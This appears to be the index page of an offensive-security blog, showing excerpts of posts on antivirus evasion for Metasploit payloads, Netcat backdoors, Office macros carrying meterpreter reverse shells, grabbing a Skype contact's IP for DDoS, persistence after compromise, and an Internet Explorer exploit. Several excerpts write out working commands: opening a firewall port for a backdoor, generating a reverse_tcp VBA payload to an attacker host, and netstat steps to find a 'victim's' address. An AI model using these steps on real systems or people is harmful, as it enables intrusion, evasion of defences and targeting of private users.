List of Differnet AV evasion Frameworks.

Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.(1)Veil:-Veil is python based tool which create FUD payload , One of the best framework for AV evasion. On the 15th of every month, at least one...

Read More

Backdoor using Netcat, cryptcat , ncat.

Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here.  Also i assume that you have already open port 455 using following command.netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALLAttacker `s I.P : 192.168.56.1Victim`s I.P.     : 192.168.56.101We will talk about Netcat, cryptcat & ncat.(A)Netcat:-Netcat is used as backdoor....

Read More

Get shell Using Shellcode in Macro.

We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.msfconsoleuse payload/windows/meterpreter/reverse_tcpset LHOST 192.168.56.102set LPORT 443generate -t vbaexploit Now we have generated our shellcode. Now we will create macro.(1)Open any word or Excell document(2)Click on view & then click on Macros.(3)Give name to macro & create...

Read More

How to detect Avast Antivirus remotely?

During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV & install it in virtual box & try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not?Original video is posted here. In avast their is feature of site blocking ; so if you want to block any site you can...

Read More

Fun with skype resolver

Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them.If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P. netstat -tupan | grep skype > n1Now chat with your victim; as soon as you got reply use following command.netstat -tupan | grep skype > n2diff n1 n2 Now we have I.P. of victim.In most situation our...

Read More

Get shell using Missing Autoruns.

In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc.(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will run in background.When uninstallation of program is not completed ; then it fails to remove its...

Read More

Schedule Task in windows after Exploitation.

Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put  their method here.After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You can create FUD payload using Veil.We can also create schedule task for our backdoor.First...

Read More

Exploit For All IE version(CVE-2013-3893).

Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded here.This module exploits a use-after-free vulnerability that currents targets Internet Explorer...

Read More